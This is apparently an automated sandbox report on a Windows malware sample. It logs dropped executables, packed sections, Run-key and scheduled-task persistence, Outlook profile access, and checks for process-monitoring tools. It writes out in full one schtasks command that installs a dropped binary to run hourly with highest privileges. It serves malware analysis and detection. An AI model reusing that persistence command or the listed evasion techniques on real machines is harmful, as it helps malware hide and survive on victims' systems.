Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: setup.exe Static file information: File size 1890304 > 1048576
Source: setup.exe Static PE information: Raw size of rcpodcma is bigger than: 0x100000 < 0x19c400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rcpodcma:EW;xhzzwohn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rcpodcma:EW;xhzzwohn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 3.2.explortu.exe.580000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rcpodcma:EW;xhzzwohn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rcpodcma:EW;xhzzwohn:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b6042db502.exe Unpacked PE file: 5.2.b6042db502.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fxenntlj:EW;rfqkatsz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fxenntlj:EW;rfqkatsz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Unpacked PE file: 9.2.8bcaec3fef.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;scsndyuu:EW;ijglijhd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;scsndyuu:EW;ijglijhd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 27.2.RageMP131.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lprblcfc:EW;njkxwkyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lprblcfc:EW;njkxwkyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Unpacked PE file: 28.2.axplong.exe.d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fxenntlj:EW;rfqkatsz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fxenntlj:EW;rfqkatsz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 29.2.explortu.exe.580000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rcpodcma:EW;xhzzwohn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rcpodcma:EW;xhzzwohn:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: eaa97795e9.exe.2.dr Static PE information: real checksum: 0x266982 should be: 0x25cc8c
Source: MPGPH131.exe.8.dr Static PE information: real checksum: 0x266982 should be: 0x25cc8c
Source: random[1].exe0.2.dr Static PE information: real checksum: 0x1d9cdf should be: 0x1d9d35
Source: random[1].exe1.2.dr Static PE information: real checksum: 0x266982 should be: 0x25cc8c
Source: RageMP131.exe.8.dr Static PE information: real checksum: 0x266982 should be: 0x25cc8c
Source: 8bcaec3fef.exe.2.dr Static PE information: real checksum: 0x251736 should be: 0x24c75f
Source: setup.exe Static PE information: real checksum: 0x1d9930 should be: 0x1d0006
Source: axplong.exe.5.dr Static PE information: real checksum: 0x1d9cdf should be: 0x1d9d35
Source: explortu.exe.0.dr Static PE information: real checksum: 0x1d9930 should be: 0x1d0006
Source: sarra[1].exe.2.dr Static PE information: real checksum: 0x24f603 should be: 0x24aa59
Source: random[1].exe.2.dr Static PE information: real checksum: 0x251736 should be: 0x24c75f
Source: b6042db502.exe.2.dr Static PE information: real checksum: 0x1d9cdf should be: 0x1d9d35
PE file contains sections with non-standard names
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: rcpodcma
Source: setup.exe Static PE information: section name: xhzzwohn
Source: setup.exe Static PE information: section name: .taggant
Source: explortu.exe.0.dr Static PE information: section name:
Source: explortu.exe.0.dr Static PE information: section name: .idata
Source: explortu.exe.0.dr Static PE information: section name:
Source: explortu.exe.0.dr Static PE information: section name: rcpodcma
Source: explortu.exe.0.dr Static PE information: section name: xhzzwohn
Source: explortu.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.2.dr Static PE information: section name:
Source: random[1].exe.2.dr Static PE information: section name: .idata
Source: random[1].exe.2.dr Static PE information: section name:
Source: random[1].exe.2.dr Static PE information: section name: scsndyuu
Source: random[1].exe.2.dr Static PE information: section name: ijglijhd
Source: random[1].exe.2.dr Static PE information: section name: .taggant
Source: 8bcaec3fef.exe.2.dr Static PE information: section name:
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: .idata
Source: 8bcaec3fef.exe.2.dr Static PE information: section name:
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: scsndyuu
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: ijglijhd
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: .taggant
Source: sarra[1].exe.2.dr Static PE information: section name:
Source: sarra[1].exe.2.dr Static PE information: section name: .idata
Source: sarra[1].exe.2.dr Static PE information: section name:
Source: sarra[1].exe.2.dr Static PE information: section name: rixklhlm
Source: sarra[1].exe.2.dr Static PE information: section name: kyzvntvb
Source: sarra[1].exe.2.dr Static PE information: section name: .taggant
Source: random[1].exe0.2.dr Static PE information: section name:
Source: random[1].exe0.2.dr Static PE information: section name: .idata
Source: random[1].exe0.2.dr Static PE information: section name:
Source: random[1].exe0.2.dr Static PE information: section name: fxenntlj
Source: random[1].exe0.2.dr Static PE information: section name: rfqkatsz
Source: random[1].exe0.2.dr Static PE information: section name: .taggant
Source: b6042db502.exe.2.dr Static PE information: section name:
Source: b6042db502.exe.2.dr Static PE information: section name: .idata
Source: b6042db502.exe.2.dr Static PE information: section name:
Source: b6042db502.exe.2.dr Static PE information: section name: fxenntlj
Source: b6042db502.exe.2.dr Static PE information: section name: rfqkatsz
Source: b6042db502.exe.2.dr Static PE information: section name: .taggant
Source: random[1].exe1.2.dr Static PE information: section name:
Source: random[1].exe1.2.dr Static PE information: section name: .idata
Source: random[1].exe1.2.dr Static PE information: section name:
Source: random[1].exe1.2.dr Static PE information: section name: lprblcfc
Source: random[1].exe1.2.dr Static PE information: section name: njkxwkyq
Source: random[1].exe1.2.dr Static PE information: section name: .taggant
Source: eaa97795e9.exe.2.dr Static PE information: section name:
Source: eaa97795e9.exe.2.dr Static PE information: section name: .idata
Source: eaa97795e9.exe.2.dr Static PE information: section name:
Source: eaa97795e9.exe.2.dr Static PE information: section name: lprblcfc
Source: eaa97795e9.exe.2.dr Static PE information: section name: njkxwkyq
Source: eaa97795e9.exe.2.dr Static PE information: section name: .taggant
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: fxenntlj
Source: axplong.exe.5.dr Static PE information: section name: rfqkatsz
Source: axplong.exe.5.dr Static PE information: section name: .taggant
Source: RageMP131.exe.8.dr Static PE information: section name:
Source: RageMP131.exe.8.dr Static PE information: section name: .idata
Source: RageMP131.exe.8.dr Static PE information: section name:
Source: RageMP131.exe.8.dr Static PE information: section name: lprblcfc
Source: RageMP131.exe.8.dr Static PE information: section name: njkxwkyq
Source: RageMP131.exe.8.dr Static PE information: section name: .taggant
Source: MPGPH131.exe.8.dr Static PE information: section name:
Source: MPGPH131.exe.8.dr Static PE information: section name: .idata
Source: MPGPH131.exe.8.dr Static PE information: section name:
Source: MPGPH131.exe.8.dr Static PE information: section name: lprblcfc
Source: MPGPH131.exe.8.dr Static PE information: section name: njkxwkyq
Source: MPGPH131.exe.8.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_00420A76 push ecx; ret 9_2_00420A89
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DB3F59 push ecx; ret 27_2_00DB3F6C
Source: setup.exe Static PE information: section name: entropy: 7.983659376043328
Source: setup.exe Static PE information: section name: rcpodcma entropy: 7.954832909258272
Source: explortu.exe.0.dr Static PE information: section name: entropy: 7.983659376043328
Source: explortu.exe.0.dr Static PE information: section name: rcpodcma entropy: 7.954832909258272
Source: random[1].exe.2.dr Static PE information: section name: entropy: 7.984851641511565
Source: random[1].exe.2.dr Static PE information: section name: scsndyuu entropy: 7.943139304831764
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: entropy: 7.984851641511565
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: scsndyuu entropy: 7.943139304831764
Source: sarra[1].exe.2.dr Static PE information: section name: entropy: 7.987111046842174
Source: sarra[1].exe.2.dr Static PE information: section name: rixklhlm entropy: 7.954282109274717
Source: random[1].exe0.2.dr Static PE information: section name: entropy: 7.980770467400511
Source: random[1].exe0.2.dr Static PE information: section name: fxenntlj entropy: 7.954110599148513
Source: b6042db502.exe.2.dr Static PE information: section name: entropy: 7.980770467400511
Source: b6042db502.exe.2.dr Static PE information: section name: fxenntlj entropy: 7.954110599148513
Source: random[1].exe1.2.dr Static PE information: section name: entropy: 7.982488418091656
Source: random[1].exe1.2.dr Static PE information: section name: lprblcfc entropy: 7.954067718951089
Source: eaa97795e9.exe.2.dr Static PE information: section name: entropy: 7.982488418091656
Source: eaa97795e9.exe.2.dr Static PE information: section name: lprblcfc entropy: 7.954067718951089
Source: axplong.exe.5.dr Static PE information: section name: entropy: 7.980770467400511
Source: axplong.exe.5.dr Static PE information: section name: fxenntlj entropy: 7.954110599148513
Source: RageMP131.exe.8.dr Static PE information: section name: entropy: 7.982488418091656
Source: RageMP131.exe.8.dr Static PE information: section name: lprblcfc entropy: 7.954067718951089
Source: MPGPH131.exe.8.dr Static PE information: section name: entropy: 7.982488418091656
Source: MPGPH131.exe.8.dr Static PE information: section name: lprblcfc entropy: 7.954067718951089
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Jump to dropped file
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\1000015002\b6042db502.exe File created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\1000015002\b6042db502.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run eaa97795e9.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Creates job files (autostart)
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run eaa97795e9.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run eaa97795e9.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found stalling execution ending in API Sleep call
